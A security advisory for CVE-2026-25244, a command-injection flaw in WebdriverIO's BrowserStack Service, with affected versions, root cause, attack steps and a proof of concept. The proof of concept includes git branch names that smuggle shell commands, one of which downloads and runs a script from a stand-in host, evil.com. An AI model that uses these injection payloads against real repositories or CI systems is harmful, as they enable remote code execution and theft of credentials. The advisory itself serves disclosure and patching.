CVE-2026-25244: WebdriverIO BrowserStack Service allows malicious code execution
GHSA-5c46-x3qw-q7j7
CVE-2026-25244
Summary
A vulnerability in WebdriverIO's BrowserStack Service allows attackers to execute malicious code when processing git branch names in test orchestration. This can happen if an attacker creates a malicious git repository with a branch name containing malicious commands. To fix this, ensure that you're using a trusted git repository and configure the service to use a secure source.
What to do
- Update `@wdio/browserstack-service` to version 9.24.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | wdio | browserstack-service | <= 9.23.2 (fix: upgrade to 9.24.0) |
| – | openjsf | webdriverio | < 9.24.0 (cpe:2.3:a:openjsf:webdriverio:*:*:*:*:*:node.js:*:*) |
Original title
WebdriverIO BrowserStack Service has a Command Injection issue
Original description
### Summary
A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.
### Details
### Vulnerable Code
**File**: https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204
### Root Cause
User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters, which can be used for command injection.
Git allows these branches to be created:
```bash
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}>/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED"
```
### Attack Vector
1. Attacker creates a malicious git repository with a branch name containing command injection payload
2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. If `source` is not provided, the current directory is used as `source`.
3. When `getGitMetadataForAISelection()` executes, it extracts the malicious branch name
4. Branch name is interpolated into shell commands without sanitization
5. Shell interprets special characters and executes attacker's commands
### PoC
### Step 1: Create Malicious Repository Branch
```bash
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
```
### Step 2: Configure WebdriverIO
```javascript
// wdio.conf.js
export const config = {
    services: [
        ['browserstack', {
            user: process.env.BROWSERSTACK_USERNAME,
            key: process.env.BROWSERSTACK_ACCESS_KEY,
            testOrchestrationOptions: {
                runSmartSelection: {
                    enabled: true,
                    source: ['/tmp/malicious-repo'] // ⚠️ Points to the malicious repo; without a "source" field it runs in the current directory.
                }
            }
        }]
    ],
    // ... rest of config
}
```
### Step 3: Run Tests
```bash
npm run wdio
```
### Step 4: Verify RCE
```bash
# Check if file was created (proof of RCE)
ls -la /tmp/pwned.txt
```
### Impact
- **Remote Code Execution** on CI/CD servers or developer machines
- **Information Disclosure** (environment variables, secrets, credentials)
- **Data Exfiltration** (source code, SSH keys, configuration files)
- **System Compromise** (backdoor installation, lateral movement)
- **Supply Chain Attack** (modify build artifacts)
CVSS 3.1 (GHSA): 9.8
Vulnerability type: CWE-78 (OS Command Injection)
References
- https://github.com/advisories/GHSA-5c46-x3qw-q7j7
- https://github.com/webdriverio/webdriverio/security/advisories/GHSA-5c46-x3qw-q7...
- https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c4697...
- https://github.com/webdriverio/webdriverio/releases/tag/v9.24.0
- https://nvd.nist.gov/vuln/detail/CVE-2026-25244
Published: 11 May 2026 · Updated: 28 May 2026 · First seen: 11 May 2026